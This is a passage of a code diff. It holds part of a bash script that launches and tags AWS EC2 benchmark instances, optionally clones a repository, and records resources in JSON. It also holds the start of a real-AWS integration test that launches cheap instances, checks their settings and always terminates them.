+# Quoted heredoc -> nothing here is expanded by this script; it runs on the instance.
+USER_DATA="$(cat <<'EOF'
+#!/bin/bash
+sudo systemctl disable --now snap.amazon-ssm-agent.amazon-ssm-agent || sudo systemctl disable --now amazon-ssm-agent
+if command -v dnf >/dev/null 2>&1; then
+  sudo dnf install -y git nmap-ncat tmux htop mdadm xfsprogs
+elif command -v apt-get >/dev/null 2>&1; then
+  sudo apt-get update -y && sudo apt-get install -y git netcat-openbsd tmux htop mdadm xfsprogs
+fi
+EOF
+)"
+
+# Optionally clone the repro-collection repo into the login user's home dir.
+# Only REPO_* vars expand here (each validated against an allowlist above, since
+# this block runs as root on the instance); instance-side vars ($_d, $(...))
+# stay literal. REPO_URL/REPO_BRANCH are single-quoted in the emitted script,
+# and the allowlist already forbids quotes, so no value can break out. The clone
+# always fetches the default branch first (so a wrong/missing REPO_BRANCH never
+# leaves the repo un-cloned), then best-effort checks out REPO_BRANCH.
+if [ "${CLONE_REPO}" = "true" ]; then
+    CLONE_BLOCK="$(cat <<EOF
+
+# --- Clone repro-collection into ${LOGIN_USER}'s home (user-data runs as root) ---
+_d="/home/${LOGIN_USER}/${REPO_DEST_NAME}"
+if [ ! -d "\$_d" ]; then
+  echo "[create_instance] cloning ${REPO_URL} -> \$_d"
+  if sudo -u ${LOGIN_USER} git clone -- '${REPO_URL}' "\$_d"; then
+    if [ -n "${REPO_BRANCH}" ]; then
+      sudo -u ${LOGIN_USER} git -C "\$_d" checkout '${REPO_BRANCH}' \
+        || echo "[create_instance] WARNING: branch '${REPO_BRANCH}' not found on remote; staying on default branch"
+    fi
+  else
+    echo "[create_instance] ERROR: git clone failed"
+  fi
+fi
+EOF
+)"
+    USER_DATA="${USER_DATA}${CLONE_BLOCK}"
+    info "Repo clone enabled: ${REPO_URL}${REPO_BRANCH:+ (branch ${REPO_BRANCH})} -> ~/${REPO_DEST_NAME}"
+else
+    info "Repo clone disabled (CLONE_REPO=false)"
+fi
+
+INSTANCE_NAME="repro-${EXPNAME}-sut"
+TAGS="ResourceType=instance,Tags=[{Key=Name,Value=${INSTANCE_NAME}},{Key=Owner,Value=${OWNER_TAG}}]"
+
+# Placement string: tenancy always, group name only when requested. Placement
+# groups accept default and dedicated tenancy; only Dedicated Hosts (host
+# tenancy) cannot launch into one.
+PLACEMENT="Tenancy=${TENANCY}"
+if [ -n "${PLACEMENT_GROUP_NAME}" ]; then
+    [ "${TENANCY}" != "host" ] \
+        || warn "Placement group '${PLACEMENT_GROUP_NAME}' with Tenancy=host: EC2 does not allow Dedicated Hosts in placement groups; the launch will fail"
+    if [ "${PG_DRYRUN_MISSING}" = "true" ]; then
+        # The group was not created (dry run); referencing it would fail with a
+        # spurious not-found error instead of validating the rest of the request.
+        info "DRYRUN=true: omitting GroupName=${PLACEMENT_GROUP_NAME} from the validated request (group not created)"
+    else
+        PLACEMENT="${PLACEMENT},GroupName=${PLACEMENT_GROUP_NAME}"
+    fi
+fi
+
+# Display strings shared by the launch plan and the final summary (computed
+# once so the two blocks cannot drift).
+if [ -n "${PLACEMENT_GROUP_NAME}" ]; then
+    if   [ "${PG_DRYRUN_MISSING}" = "true" ]; then _pg_state="would be created"
+    elif [ "${PG_CREATED}" = "true" ];        then _pg_state="created"
+    else                                           _pg_state="existing"; fi
+    PG_DISPLAY="${PLACEMENT_GROUP_NAME} (${PLACEMENT_GROUP_STRATEGY}, ${_pg_state})"
+else
+    PG_DISPLAY="(none)"
+fi
+DATA_DISKS_DISPLAY="${EBS_DISKS_NUMBER} x ${EBS_DISKS_SIZE} GiB ${EBS_DISKS_TYPE}${EBS_DISKS_IOPS:+ (IOPS ${EBS_DISKS_IOPS})}"
+
+# --------------------------------------------------------------------------
+# Summary of what we're about to launch.
+# --------------------------------------------------------------------------
+cat >&2 <<SUMMARY
+
+============================ Launch plan ============================
+  Region / profile : ${AWS_REGION} / ${AWS_PROFILE:-default}
+  Instance type    : ${INSTANCE_TYPE}  (arch ${ARCH})
+  AMI              : ${AMI_ID}
+  Key pair         : ${KEYPAIR}
+  Tenancy          : ${TENANCY}
+  Subnet / SG      : ${SUBNET_ID} / ${SG_ID}
+  Placement group  : ${PG_DISPLAY}
+  Public IP        : ${ASSOCIATE_PUBLIC_IP}
+  Root disk        : ${ROOT_DISK_SIZE} GiB ${ROOT_DISK_TYPE} (${ROOT_DEVICE})
+  Data disks       : ${DATA_DISKS_DISPLAY}
+  Name tag         : ${INSTANCE_NAME}  (Owner=${OWNER_TAG})
+  Clone repo       : $( [ "${CLONE_REPO}" = "true" ] && printf '%s -> ~/%s%s' "${REPO_URL}" "${REPO_DEST_NAME}" "${REPO_BRANCH:+ (${REPO_BRANCH})}" || printf 'no' )
+====================================================================
+
+SUMMARY
+
+RUN_ARGS=(
+    ec2 run-instances
+    --image-id "${AMI_ID}"
+    --instance-type "${INSTANCE_TYPE}"
+    --key-name "${KEYPAIR}"
+    --network-interfaces "${NET_IFACE}"
+    --placement "${PLACEMENT}"
+    --block-device-mappings "${BDM}"
+    --user-data "${USER_DATA}"
+    --tag-specifications "${TAGS}"
+)
+
+if [ "${DRYRUN}" = "true" ]; then
+    warn "DRYRUN=true: validating with EC2 --dry-run (no instance will be created)"
+    _dryrun_out="$(mktemp)"
+    if aws_cli "${RUN_ARGS[@]}" --dry-run 2>"${_dryrun_out}"; then
+        info "Dry run reported success"
+    elif grep -q "DryRunOperation" "${_dryrun_out}"; then
+        info "Dry run OK: request is well-formed and authorized (DryRunOperation)"
+    else
+        cat "${_dryrun_out}" >&2
+        rm -f "${_dryrun_out}"
+        die "Dry run failed"
+    fi
+    rm -f "${_dryrun_out}"
+    info "Block device mappings that would be used:"
+    printf '%s\n' "${BDM}" >&2
+    exit 0
+fi
+
+# --------------------------------------------------------------------------
+# Launch.
+# --------------------------------------------------------------------------
+info "Launching instance ..."
+INSTANCE_ID="$(aws_cli "${RUN_ARGS[@]}" --query 'Instances[0].InstanceId' --output text)"
+require_aws_value "${INSTANCE_ID}" "run-instances did not return an instance id"
+info "Launched: ${INSTANCE_ID}"
+
+# Record the id immediately, before waiting/describing: if anything below fails
+# (wait interrupted, describe throttled) the running, billed instance must not
+# be left untracked in the resource JSON.
+if json_merge '
+    .expname = $exp | .region = $region
+    | (if $profile == "" then . else .profile = $profile end)
+    | .instances += [{
+        instance_id: $iid, name: $name, instance_type: $itype,
+        arch: $arch, ami: $ami
+      }]' \
+    --arg exp "${EXPNAME}" --arg region "${AWS_REGION}" --arg profile "${AWS_PROFILE:-}" \
+    --arg iid "${INSTANCE_ID}" --arg name "${INSTANCE_NAME}" --arg itype "${INSTANCE_TYPE}" \
+    --arg arch "${ARCH}" --arg ami "${AMI_ID}"
+then
+    [ "${SAVE_RESOURCES}" = "true" ] && info "Recorded instance id in ${RESOURCE_FILE}"
+fi
+
+if [ "${NO_WAIT:-false}" != "true" ]; then
+    info "Waiting for instance to reach 'running' ..."
+    aws_cli ec2 wait instance-running --instance-ids "${INSTANCE_ID}" \
+        || warn "wait failed; the instance may still be initialising"
+fi
+
+# --------------------------------------------------------------------------
+# Final summary with IP addresses. A failed describe must not abort the script
+# (the instance is already running); it only leaves the detail fields empty.
+# --------------------------------------------------------------------------
+STATE="" AZ="" PRIV_IP="" PUB_IP=""
+read -r STATE AZ PRIV_IP PUB_IP < <(aws_cli ec2 describe-instances \
+    --instance-ids "${INSTANCE_ID}" \
+    --query 'Reservations[0].Instances[0].[State.Name,Placement.AvailabilityZone,PrivateIpAddress,PublicIpAddress]' \
+    --output text) \
+    || warn "describe-instances failed; instance details in the summary may be empty"
+
+[ "${PUB_IP}" = "None" ] && PUB_IP=""
+PUB_IP_DISPLAY="${PUB_IP:-(none)}"
+
+# --------------------------------------------------------------------------
+# Enrich the resource record so follow-up runs can query/reuse it. The
+# placement group entry stores the subnet/AZ this instance landed in, which is
+# exactly what the next launch into the same (cluster) group must reuse.
+# --------------------------------------------------------------------------
+if json_merge '
+    .instances[-1] += {
+        availability_zone: $az, subnet_id: $subnet, security_group_id: $sg,
+        private_ip: $priv, public_ip: $pub,
+        placement_group: (if $pg == "" then null else $pg end)
+    }
+    | (if $pg == "" then . else
+        .placement_group.name = $pg
+        | .placement_group.strategy = $pgstrat
+        | (if $pgid == "" then . else .placement_group.group_id = $pgid end)
+        | .placement_group.subnet_id = $subnet
+        | .placement_group.availability_zone = $az
+      end)
+    ' \
+    --arg az "${AZ}" --arg subnet "${SUBNET_ID}" --arg sg "${SG_ID}" \
+    --arg priv "${PRIV_IP}" --arg pub "${PUB_IP}" \
+    --arg pg "${PLACEMENT_GROUP_NAME}" --arg pgstrat "${PLACEMENT_GROUP_STRATEGY}" \
+    --arg pgid "${PG_GROUP_ID}"
+then
+    [ "${SAVE_RESOURCES}" = "true" ] && info "Recorded resources in ${RESOURCE_FILE}"
+fi
+
+cat <<SUMMARY
+
+======================= Instance summary =======================
+  Instance ID   : ${INSTANCE_ID}
+  Name          : ${INSTANCE_NAME}
+  State         : ${STATE}
+  Type / arch   : ${INSTANCE_TYPE} / ${ARCH}
+  AMI           : ${AMI_ID}
+  Region / AZ   : ${AWS_REGION} / ${AZ}
+  Subnet / SG   : ${SUBNET_ID} / ${SG_ID}
+  Tenancy       : ${TENANCY}
+  Placement grp : ${PG_DISPLAY}
+  Private IP    : ${PRIV_IP}
+  Public  IP    : ${PUB_IP_DISPLAY}
+  Data disks    : ${DATA_DISKS_DISPLAY}
+  Repo          : $( [ "${CLONE_REPO}" = "true" ] && printf '~/%s (%s)' "${REPO_DEST_NAME}" "${REPO_URL}" || printf 'not cloned' )
+  Resource JSON : $( [ "${SAVE_RESOURCES}" = "true" ] && printf '%s' "${RESOURCE_FILE}" || printf 'disabled' )
+================================================================
+
+  SSH:  ssh ${LOGIN_USER}@${PUB_IP_DISPLAY}$( [ "${SG_IS_DEFAULT}" = "true" ] && printf '   (WARNING: SG %s is the VPC default and likely has no tcp/22 ingress; SSH may fail)' "${SG_ID}" )
+  Tail cloud-init:  ssh ${LOGIN_USER}@${PUB_IP_DISPLAY} 'sudo tail -f /var/log/cloud-init-output.log'
+  Terminate:  aws ${AWS_PROFILE:+--profile ${AWS_PROFILE}} --region ${AWS_REGION} ec2 terminate-instances --instance-ids ${INSTANCE_ID}
+
+SUMMARY

--- a/tests/integration/aws_create_instance_integration.sh
+++ b/tests/integration/aws_create_instance_integration.sh
@@ -1,0 +1,440 @@
+#!/usr/bin/env bash
+#
+# aws_create_instance_integration.sh - REAL-AWS end-to-end test for
+# scripts/aws_create_instance.sh.
+#
+# For each test case it:
+#   1. (pre-flight) validates the request with the script's own DRYRUN=true,
+#   2. launches a real instance,
+#   3. reads the launched instance id from the resource JSON the script writes,
+#   4. queries AWS (describe-instances / describe-volumes) and asserts the
+#      settings that actually landed match what was requested,
+#   5. terminates the instance (always), then moves to the next case.
+#
+# This spends real money and creates real resources. It therefore:
+#   - refuses to run without explicit confirmation (--yes or CONFIRM=yes),
+#   - prints the target account/region up front,
+#   - forces cheap, broadly-available instance types and Tenancy=default,
+#   - installs an EXIT/INT/TERM trap that terminates every instance it launched
+#     and deletes any placement group / temp key pair it created, even on
+#     failure or Ctrl-C. Cleanup runs whether or not assertions passed, so a
+#     failed check can never leave a billed instance behind.
+#
+# Usage:
+#   AWS_PROFILE=databases AWS_REGION=us-west-2 \
+#     tests/integration/aws_create_instance_integration.sh --yes
+#
+# Options / env:
+#   --yes | CONFIRM=yes   Required to actually run.
+#   --keep                Do NOT terminate on success (debugging). Cleanup trap
+#                         still fires on failure/interrupt. Off by default.
+#   --filter <substr>     Only run test cases whose name contains <substr>.
+#   AWS_PROFILE           AWS CLI profile (recommended).
+#   AWS_REGION            AWS region (default: from profile/config).
+#   KEYPAIR               Existing key pair to use. If unset, a temporary one is
+#                         created and deleted at the end.
+#   SUBNET_ID / SG_ID     Optional; passed through to the script and asserted.
+#   ARM_TYPE / X86_TYPE   Override the instance types (default t4g.micro / t3.micro).
+#   PG_TYPE               Instance type for the placement-group case; must be a
+#                         non-burstable type (burstable t2/t3/t4g cannot join a
+#                         cluster placement group). Default c6g.medium.
+#
+set -uo pipefail
+
+# --------------------------------------------------------------------------
+# Locate the script under test.
+# --------------------------------------------------------------------------
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+SUT="$(cd "${HERE}/../.." && pwd)/scripts/aws_create_instance.sh"
+[ -f "${SUT}" ] || { echo "cannot find ${SUT}" >&2; exit 2; }
+
+WORK="$(mktemp -d)"
+ARM_TYPE="${ARM_TYPE:-t4g.micro}"
+X86_TYPE="${X86_TYPE:-t3.micro}"
+# Burstable types (t2/t3/t4g) cannot join a cluster placement group, so the PG
+# case needs a current-gen non-burstable type. c6g.medium is the cheapest ARM
+# one that qualifies; override with PG_TYPE if it's unavailable in your region.
+PG_TYPE="${PG_TYPE:-c6g.medium}"
+
+# --------------------------------------------------------------------------
+# Options.
+# --------------------------------------------------------------------------
+CONFIRM="${CONFIRM:-}"
+KEEP="false"
+FILTER=""
+while [ $# -gt 0 ]; do
+    case "$1" in
+        --yes)    CONFIRM="yes" ;;
+        --keep)   KEEP="true" ;;
+        --filter) FILTER="${2:-}"; shift ;;
+        -h|--help) sed -n '2,/^set -uo pipefail$/{/^set -uo pipefail$/d; s/^#\( \|$\)//; p}' "$0"; exit 0 ;;
+        *) echo "unknown argument '$1' (see --help)" >&2; exit 2 ;;
+    esac
+    shift
+done
+
+# --------------------------------------------------------------------------
+# Helpers.
+# --------------------------------------------------------------------------
+RED=$'\033[31m'; GRN=$'\033[32m'; YEL=$'\033[33m'; CYN=$'\033[36m'; RST=$'\033[0m'
+info() { printf '%s[intg]%s %s\n' "${CYN}" "${RST}" "$*"; }
+warn() { printf '%s[intg]%s %s\n' "${YEL}" "${RST}" "$*"; }
+err()  { printf '%s[intg]%s %s\n' "${RED}" "${RST}" "$*" >&2; }
+
+command -v aws >/dev/null 2>&1 || { err "aws CLI not found in PATH"; exit 2; }
+command -v jq  >/dev/null 2>&1 || { err "jq not found in PATH (required)"; exit 2; }
+
+# aws wrapper mirroring the script: inject --region/--profile when set.
+aws_q() {
+    local extra=()
+    [ -n "${AWS_REGION:-}"  ] && extra+=(--region  "${AWS_REGION}")
+    [ -n "${AWS_PROFILE:-}" ] && extra+=(--profile "${AWS_PROFILE}")
+    command aws "${extra[@]}" --no-cli-pager "$@"
+}
+
+TESTS=0 PASS=0 FAIL=0
+CUR=""            # current test name, for assertion labels
+check() {         # check <label> <expected> <actual>
+    TESTS=$((TESTS+1))
+    if [ "$2" = "$3" ]; then
+        PASS=$((PASS+1)); printf '    %s✓%s %s\n' "${GRN}" "${RST}" "$1"
+    else
+        FAIL=$((FAIL+1)); printf '    %s✗%s %s  (expected [%s] got [%s])\n' "${RED}" "${RST}" "$1" "$2" "$3"
+    fi
+}
+check_ge() {      # check_ge <label> <min> <actual>
+    TESTS=$((TESTS+1))
+    if [ "$3" -ge "$2" ] 2>/dev/null; then
+        PASS=$((PASS+1)); printf '    %s✓%s %s\n' "${GRN}" "${RST}" "$1"
+    else
+        FAIL=$((FAIL+1)); printf '    %s✗%s %s  (expected >=[%s] got [%s])\n' "${RED}" "${RST}" "$1" "$2" "$3"
+    fi
+}
+
+# --------------------------------------------------------------------------
+# Resource tracking + cleanup (safety net; always runs).
+# --------------------------------------------------------------------------
+declare -a CREATED_INSTANCES=()
+declare -a CREATED_VOLUMES=()   # EBS volumes attached to launched instances
+declare -a CREATED_PGS=()
+TEMP_KEYPAIR=""
+
+# reap_volumes: for every tracked EBS volume, ensure it is gone. The script
+# sets DeleteOnTermination=true so volumes normally vanish with the instance;
+# this verifies that and force-deletes any straggler (e.g. a volume that was
+# not marked delete-on-termination). Drops reaped ids from CREATED_VOLUMES;
+# leaves only ones it could not remove.
+reap_volumes() {
+    [ "${#CREATED_VOLUMES[@]}" -gt 0 ] || { CREATED_VOLUMES=(); return 0; }
+    local remaining=() v state
+    for v in "${CREATED_VOLUMES[@]}"; do
+        [ -n "${v}" ] || continue
+        state="$(aws_q ec2 describe-volumes --volume-ids "${v}" --query 'Volumes[0].State' --output text 2>/dev/null || true)"
+        if [ -z "${state}" ] || [ "${state}" = "None" ]; then
+            continue                                   # already gone
+        fi
+        if [ "${state}" = "deleting" ]; then
+            aws_q ec2 wait volume-deleted --volume-ids "${v}" 2>/dev/null || true
+        else
+            # in-use/available: it survived termination -> detach + delete it.
+            aws_q ec2 wait volume-available --volume-ids "${v}" 2>/dev/null || true
+            info "Force-deleting leftover volume ${v} (state ${state})"
+            aws_q ec2 delete-volume --volume-id "${v}" >/dev/null 2>&1 || true
+            aws_q ec2 wait volume-deleted --volume-ids "${v}" 2>/dev/null || true
+        fi
+        state="$(aws_q ec2 describe-volumes --volume-ids "${v}" --query 'Volumes[0].State' --output text 2>/dev/null || true)"
+        if [ -n "${state}" ] && [ "${state}" != "None" ]; then
+            warn "volume ${v} still present (state ${state})"; remaining+=("${v}")
+        fi
+    done
+    CREATED_VOLUMES=("${remaining[@]}")
+}
+
+# delete_pg <name>: delete a placement group (must be empty first) and verify it
+# is gone. Drops it from CREATED_PGS on success; keeps it for the safety net if
+# deletion failed. Returns 1 if the group is still present afterwards.
+delete_pg() {
+    local name="$1" exists
+    [ -n "${name}" ] || return 0
+    info "Deleting placement group ${name} ..."
+    aws_q ec2 delete-placement-group --group-name "${name}" >/dev/null 2>&1 || warn "delete-placement-group call failed for ${name}"
+    exists="$(aws_q ec2 describe-placement-groups --group-names "${name}" \
+        --query 'PlacementGroups[0].GroupName' --output text 2>/dev/null || true)"
+    local kept=() x
+    for x in "${CREATED_PGS[@]}"; do [ "${x}" = "${name}" ] || kept+=("${x}"); done
+    CREATED_PGS=("${kept[@]}")
+    if [ -z "${exists}" ] || [ "${exists}" = "None" ]; then
+        info "Placement group ${name} deleted"; return 0
+    fi
+    warn "placement group ${name} still present after delete"; CREATED_PGS+=("${name}"); return 1
+}
+
+terminate_instance() {   # terminate <id>, wait, then reap its EBS volumes
+    local id="$1"
+    [ -n "${id}" ] && [ "${id}" != "None" ] || return 0
+    info "Terminating ${id} ..."
+    aws_q ec2 terminate-instances --instance-ids "${id}" >/dev/null 2>&1 || warn "terminate call failed for ${id}"
+    aws_q ec2 wait instance-terminated --instance-ids "${id}" 2>/dev/null || warn "wait-terminated failed for ${id}"
+    # Drop it from the tracking array once gone.
+    local kept=() x
+    for x in "${CREATED_INSTANCES[@]}"; do [ "${x}" = "${id}" ] || kept+=("${x}"); done
+    CREATED_INSTANCES=("${kept[@]}")
+    # EBS disks: confirm they were removed (DeleteOnTermination) / force-delete.
+    reap_volumes
+    check "EBS volume(s) deleted after termination" "0" "${#CREATED_VOLUMES[@]}"
+}
+
+cleanup() {
+    local rc=$?
+    trap - EXIT INT TERM
+    info "Cleanup ..."
+    local id
+    for id in "${CREATED_INSTANCES[@]}"; do
+        [ -n "${id}" ] || continue
+        warn "Terminating leftover instance ${id}"
+        aws_q ec2 terminate-instances --instance-ids "${id}" >/dev/null 2>&1 || true
+        aws_q ec2 wait instance-terminated --instance-ids "${id}" 2>/dev/null || true
+    done
+    CREATED_INSTANCES=()
+    # EBS disks (safety net): remove any tracked volume still around.
+    reap_volumes
+    [ "${#CREATED_VOLUMES[@]}" -eq 0 ] || warn "leftover volumes not deleted: ${CREATED_VOLUMES[*]}"
+    # Placement groups (safety net): now that members are gone, delete them.
+    local pg
+    for pg in "${CREATED_PGS[@]}"; do
+        [ -n "${pg}" ] || continue
+        aws_q ec2 delete-placement-group --group-name "${pg}" >/dev/null 2>&1 \
+            || warn "could not delete PG ${pg} (may still have members)"
+    done
+    if [ -n "${TEMP_KEYPAIR}" ]; then
+        info "Deleting temporary key pair ${TEMP_KEYPAIR}"
+        aws_q ec2 delete-key-pair --key-name "${TEMP_KEYPAIR}" >/dev/null 2>&1 || true
+    fi
+    rm -rf "${WORK}"
+    exit "${rc}"
+}
+trap cleanup EXIT INT TERM
+
+# --------------------------------------------------------------------------
+# Confirmation gate + account banner.
+# --------------------------------------------------------------------------
+if [ -z "${AWS_REGION:-}" ]; then
+    AWS_REGION="$(command aws configure get region ${AWS_PROFILE:+--profile "$AWS_PROFILE"} 2>/dev/null || true)"
+fi
+[ -n "${AWS_REGION:-}" ] || { err "AWS_REGION not set and no default region configured"; exit 2; }
+
+ACCOUNT="$(aws_q sts get-caller-identity --query 'Account' --output text 2>/dev/null || true)"
+ARN="$(aws_q sts get-caller-identity --query 'Arn' --output text 2>/dev/null || true)"
+[ -n "${ACCOUNT}" ] && [ "${ACCOUNT}" != "None" ] || { err "cannot authenticate to AWS (profile='${AWS_PROFILE:-default}')"; exit 2; }
+
+cat <<BANNER
+
+${YEL}==================== REAL AWS integration test ====================${RST}
+  Account : ${ACCOUNT}
+  Region  : ${AWS_REGION}
+  Profile : ${AWS_PROFILE:-default}
+  Identity: ${ARN}
+  Types   : ${ARM_TYPE} (arm64) / ${X86_TYPE} (x86_64) / ${PG_TYPE} (placement group)
+  This WILL create and terminate real EC2 instances (Tenancy=default).
+${YEL}===================================================================${RST}
+
+BANNER
+
+if [ "${CONFIRM}" != "yes" ]; then
+    err "Refusing to run without confirmation. Re-run with --yes (or CONFIRM=yes) once you've checked the account above."
+    exit 3
+fi
+
+# --------------------------------------------------------------------------
+# Key pair: use KEYPAIR if given, else create a temporary one.
+# --------------------------------------------------------------------------
+if [ -z "${KEYPAIR:-}" ]; then
+    TEMP_KEYPAIR="repro-inttest-$$-${RANDOM}"
+    info "Creating temporary key pair ${TEMP_KEYPAIR}"
+    aws_q ec2 create-key-pair --key-name "${TEMP_KEYPAIR}" --query 'KeyName' --output text >/dev/null \
+        || { err "could not create temporary key pair"; exit 2; }
+    KEYPAIR="${TEMP_KEYPAIR}"
+fi
+export KEYPAIR
+
+# --------------------------------------------------------------------------
+# launch_case <name> <resource-file> KEY=VAL ...
+#   Pre-flight dry-run, then launch. On success sets globals:
+#     IID   - launched instance id (from the resource JSON)
+#     INFO  - describe-instances JSON for that instance
+#   Returns 1 (and records a failure) if the launch or JSON read fails.
+# --------------------------------------------------------------------------
+launch_case() {
+    local name="$1" rfile="$2"; shift 2
+    CUR="${name}"
+    IID=""; INFO=""   # clear so a failed launch can't carry over the last id
+    printf '\n%s== %s ==%s\n' "${CYN}" "${name}" "${RST}"
+
+    # Forced-safe env for every case: cheap tenancy, no repo clone, save JSON.
+    local base=(TENANCY=default CLONE_REPO=false SAVE_RESOURCES=true
+                "RESOURCE_FILE=${rfile}" "AWS_REGION=${AWS_REGION}" "KEYPAIR=${KEYPAIR}")
+    [ -n "${AWS_PROFILE:-}" ] && base+=("AWS_PROFILE=${AWS_PROFILE}")
+    [ -n "${SUBNET_ID:-}" ]   && base+=("SUBNET_ID=${SUBNET_ID}")
+    [ -n "${SG_ID:-}" ]       && base+=("SG_ID=${SG_ID}")
+
+    # 1. Pre-flight: the script's own dry-run must accept the request (free).
+    info "Pre-flight dry-run ..."
+    if ! env "${base[@]}" DRYRUN=true "$@" bash "${SUT}" >"${WORK}/dryrun.log" 2>&1; then
+        err "dry-run rejected the request:"; sed 's/^/      /' "${WORK}/dryrun.log" >&2
+        TESTS=$((TESTS+1)); FAIL=$((FAIL+1)); return 1
+    fi
+    # EC2 confirms an authorized, well-formed request by failing --dry-run with
+    # DryRunOperation; the script surfaces that. Assert on the real marker, not
+    # merely on the exit code.
+    check "dry-run authorized by EC2 (DryRunOperation)" "yes" \
+        "$(grep -q 'DryRunOperation' "${WORK}/dryrun.log" && echo yes || echo no)"
+
+    # 2. Real launch.
+    info "Launching ..."
+    if ! env "${base[@]}" "$@" bash "${SUT}" >"${WORK}/launch.log" 2>&1; then
+        err "launch failed:"; tail -n 15 "${WORK}/launch.log" | sed 's/^/      /' >&2
+        TESTS=$((TESTS+1)); FAIL=$((FAIL+1)); return 1
+    fi
+
+    # 3. Instance id from the resource JSON the script wrote.
+    [ -f "${rfile}" ] || { err "resource JSON ${rfile} not written"; TESTS=$((TESTS+1)); FAIL=$((FAIL+1)); return 1; }
+    IID="$(jq -r '.instances[-1].instance_id // empty' "${rfile}")"
+    [ -n "${IID}" ] || { err "no instance_id in ${rfile}"; TESTS=$((TESTS+1)); FAIL=$((FAIL+1)); return 1; }
+    CREATED_INSTANCES+=("${IID}")
+    info "Launched ${IID}; querying AWS ..."
+
+    # Cross-check: the id in the JSON must be a real instance AWS returns when
+    # looked up by its Name tag (proves the recorded id is findable on AWS, not
+    # just a string the script printed). EXPNAME drives the Name tag.
+    local expname aws_iid
+    expname="$(for kv in "$@"; do case "${kv}" in EXPNAME=*) printf '%s' "${kv#EXPNAME=}" ;; esac; done)"
+    aws_iid="$(aws_q ec2 describe-instances \
+        --filters "Name=tag:Name,Values=repro-${expname}-sut" "Name=instance-state-name,Values=pending,running" \
+        --query 'Reservations[-1].Instances[-1].InstanceId' --output text 2>/dev/null || true)"
+    check "JSON instance id matches the one AWS returns for the Name tag" "${IID}" "${aws_iid}"
+
+    # 4. Fetch the live description once for the caller's assertions.
+    INFO="$(aws_q ec2 describe-instances --instance-ids "${IID}" \
+        --query 'Reservations[0].Instances[0]' --output json 2>/dev/null)"
+    [ -n "${INFO}" ] && [ "${INFO}" != "null" ] || { err "describe-instances returned nothing for ${IID}"; TESTS=$((TESTS+1)); FAIL=$((FAIL+1)); return 1; }
+
+    # Track every attached EBS volume NOW, so terminate_instance/cleanup can
+    # confirm they are deleted even if an assertion below fails or aborts.
+    local vid
+    while IFS= read -r vid; do
+        [ -n "${vid}" ] && [ "${vid}" != "null" ] && CREATED_VOLUMES+=("${vid}")
+    done < <(jq -r '.BlockDeviceMappings[].Ebs.VolumeId' <<<"${INFO}" 2>/dev/null)
+    return 0
+}
+
+# ii <jq-filter> -> value from the current INFO json
+ii() { jq -r "$1 // empty" <<<"${INFO}"; }
+
+# Assert the root and data volumes actually attached to $IID. Args:
+#   verify_volumes <expected-root-size> <expected-root-type> <expected-data-count>
+verify_volumes() {
+    local exp_root_size="$1" exp_root_type="$2" exp_data_count="$3"
+    local root_dev vids ndev
+    root_dev="$(ii '.RootDeviceName')"
+    ndev="$(jq '.BlockDeviceMappings | length' <<<"${INFO}")"
+    check "block-device count = root + ${exp_data_count} data" "$(( exp_data_count + 1 ))" "${ndev}"
+
+    # Map every attached volume to its size/type.
+    vids="$(jq -r '.BlockDeviceMappings[].Ebs.VolumeId' <<<"${INFO}" | tr '\n' ' ')"
+    local vols
+    vols="$(aws_q ec2 describe-volumes --volume-ids ${vids} \
+        --query 'Volumes[].{id:VolumeId,size:Size,type:VolumeType,att:Attachments[0].Device}' \
+        --output json 2>/dev/null)"
+    # Root volume is the one attached at RootDeviceName.
+    local rsize rtype
+    rsize="$(jq -r --arg d "${root_dev}" '.[] | select(.att==$d) | .size' <<<"${vols}")"
+    rtype="$(jq -r --arg d "${root_dev}" '.[] | select(.att==$d) | .type' <<<"${vols}")"
+    check "root volume size = ${exp_root_size} GiB" "${exp_root_size}" "${rsize}"
+    check "root volume type = ${exp_root_type}" "${exp_root_type}" "${rtype}"
+}
+
+# --------------------------------------------------------------------------
+# Test cases.
+# --------------------------------------------------------------------------
+want() { [ -z "${FILTER}" ] || case "$1" in *"${FILTER}"*) return 0 ;; *) return 1 ;; esac; }
+
+# 1. Minimal arm64 instance, default root disk.
+if want "arm64-minimal"; then
+    if launch_case "arm64-minimal" "${WORK}/t1.json" INSTANCE_TYPE="${ARM_TYPE}" EXPNAME="intg-arm-min"; then
+        check "instance type"      "${ARM_TYPE}"          "$(ii '.InstanceType')"
+        check "architecture arm64" "arm64"                "$(ii '.Architecture')"
+        check "tenancy default"    "default"              "$(ii '.Placement.Tenancy')"
+        check "Name tag"           "repro-intg-arm-min-sut" "$(ii '.Tags[] | select(.Key=="Name") | .Value')"
+        check "no placement group" ""                     "$(ii '.Placement.GroupName')"
+        verify_volumes 256 gp3 0
+    fi
+    terminate_instance "${IID:-}"
+fi
+
+# 2. x86_64 instance with a custom small root disk.
+if want "x86-custom-root"; then
+    if launch_case "x86-custom-root" "${WORK}/t2.json" \
+        INSTANCE_TYPE="${X86_TYPE}" ARCH=x86_64 ROOT_DISK_SIZE=30 ROOT_DISK_TYPE=gp3 EXPNAME="intg-x86-root"; then
+        check "instance type"        "${X86_TYPE}" "$(ii '.InstanceType')"
+        check "architecture x86_64"  "x86_64"      "$(ii '.Architecture')"
+        verify_volumes 30 gp3 0
+    fi
+    terminate_instance "${IID:-}"
+fi
+
+# 3. arm64 with two extra gp3 data disks.
+if want "arm64-data-disks"; then
+    if launch_case "arm64-data-disks" "${WORK}/t3.json" \
+        INSTANCE_TYPE="${ARM_TYPE}" EBS_DISKS_NUMBER=2 EBS_DISKS_SIZE=10 EBS_DISKS_TYPE=gp3 EXPNAME="intg-data"; then
+        check "instance type" "${ARM_TYPE}" "$(ii '.InstanceType')"
+        verify_volumes 256 gp3 2
+        # Assert the expected extra device names are present.
+        DEVS="$(jq -r '.BlockDeviceMappings[].DeviceName' <<<"${INFO}" | sort | tr '\n' ',')"
+        check "data device /dev/sdb present" "yes" "$(case "${DEVS}" in *"/dev/sdb"*) echo yes ;; *) echo no ;; esac)"
+        check "data device /dev/sdc present" "yes" "$(case "${DEVS}" in *"/dev/sdc"*) echo yes ;; *) echo no ;; esac)"
+    fi
+    terminate_instance "${IID:-}"
+fi
+
+# 4. Ubuntu AMI -> root device /dev/sda1 (the bug the RootDeviceName fix addresses).
+if want "ubuntu-root-device"; then
+    if launch_case "ubuntu-root-device" "${WORK}/t4.json" \
+        INSTANCE_TYPE="${ARM_TYPE}" AMI=UBUNTU2204 ROOT_DISK_SIZE=20 EXPNAME="intg-ubuntu"; then
